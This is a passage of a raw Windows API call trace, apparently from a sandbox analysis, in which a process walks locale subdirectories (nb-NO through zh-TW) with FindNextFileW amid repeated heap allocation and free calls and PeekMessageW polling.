cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0179.735] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0179.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x214) returned 0x2a7d6f0 [0179.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7978 [0179.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7950 [0179.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7928 [0179.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7838 [0179.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7888 [0179.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ab8 [0179.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ae0 [0179.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b08 [0179.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b30 [0179.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b58 [0179.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7b80 [0179.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0179.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7bd0 [0179.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad78d8 | out: hHeap=0x2c0000) returned 1 [0179.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7810 | out: hHeap=0x2c0000) returned 1 [0179.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7860 | out: hHeap=0x2c0000) returned 1 [0179.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad79c8 | out: hHeap=0x2c0000) returned 1 [0179.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad79f0 | out: hHeap=0x2c0000) returned 1 [0179.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a18 | out: hHeap=0x2c0000) returned 1 [0179.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a40 | out: hHeap=0x2c0000) returned 1 [0179.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a68 | out: hHeap=0x2c0000) returned 1 [0179.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a90 | out: hHeap=0x2c0000) returned 1 [0179.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7900 | out: hHeap=0x2c0000) returned 1 [0179.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77e8 | out: hHeap=0x2c0000) returned 1 [0179.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad78b0 | out: hHeap=0x2c0000) returned 1 [0179.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad79a0 | out: hHeap=0x2c0000) returned 1 [0179.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f16c8 | out: hHeap=0x2c0000) returned 1 [0179.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad79a0 [0179.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.740] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0179.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad78b0 [0179.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.741] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0179.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77e8 [0179.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.742] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0179.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7900 [0179.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.743] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0179.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a90 [0179.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.744] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0179.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a68 [0179.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.745] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0179.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x310) returned 0x2adf6e8 [0179.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0179.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a18 [0179.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad79f0 [0179.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad79c8 [0179.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7860 [0179.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7810 [0179.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad78d8 [0179.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7bf8 [0179.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7c20 [0179.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7c48 [0179.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7c70 [0179.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7c98 [0179.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7cc0 [0179.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ce8 [0179.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7d10 [0179.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7d38 [0179.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7d60 [0179.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7d88 [0179.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7db0 [0179.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7978 | out: hHeap=0x2c0000) returned 1 [0179.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0179.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7928 | out: hHeap=0x2c0000) returned 1 [0179.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7838 | out: hHeap=0x2c0000) returned 1 [0179.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7888 | out: hHeap=0x2c0000) returned 1 [0179.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ab8 | out: hHeap=0x2c0000) returned 1 [0179.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ae0 | out: hHeap=0x2c0000) returned 1 [0179.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7b08 | out: hHeap=0x2c0000) returned 1 [0179.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7b30 | out: hHeap=0x2c0000) returned 1 [0179.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7b58 | out: hHeap=0x2c0000) returned 1 [0179.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7b80 | out: hHeap=0x2c0000) returned 1 [0179.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0179.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7bd0 | out: hHeap=0x2c0000) returned 1 [0179.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad79a0 | out: hHeap=0x2c0000) returned 1 [0179.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad78b0 | out: hHeap=0x2c0000) returned 1 [0179.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77e8 | out: hHeap=0x2c0000) returned 1 [0179.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7900 | out: hHeap=0x2c0000) returned 1 [0179.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a90 | out: hHeap=0x2c0000) returned 1 [0179.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7a68 | out: hHeap=0x2c0000) returned 1 [0179.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0179.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a68 [0179.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.751] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0179.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a90 [0179.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.752] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0179.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7900 [0179.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.753] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0179.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77e8 [0179.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.753] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0179.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad76d0 [0179.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad78b0 [0179.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad76d0 | out: hHeap=0x2c0000) returned 1 [0179.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.754] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956f6400, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0179.754] FindClose (in: hFindFile=0x2a05da8 | out: hFindFile=0x2a05da8) returned 1 [0179.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7720 | out: hHeap=0x2c0000) returned 1 [0179.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a68 [0179.755] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0179.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0179.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0179.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0179.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0179.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0179.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0179.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0179.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0179.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0179.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0179.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0179.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0179.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0179.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a68 | out: hHeap=0x2c0000) returned 1 [0179.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7720 [0179.759] PeekMessageW (in: lpMsg=0x2f9fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x2f9fb74) returned 0 [0179.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0179.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.761] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad77c0 | out: hHeap=0x2c0000) returned 1 [0179.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad77c0 [0179.761] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0179.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0179.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 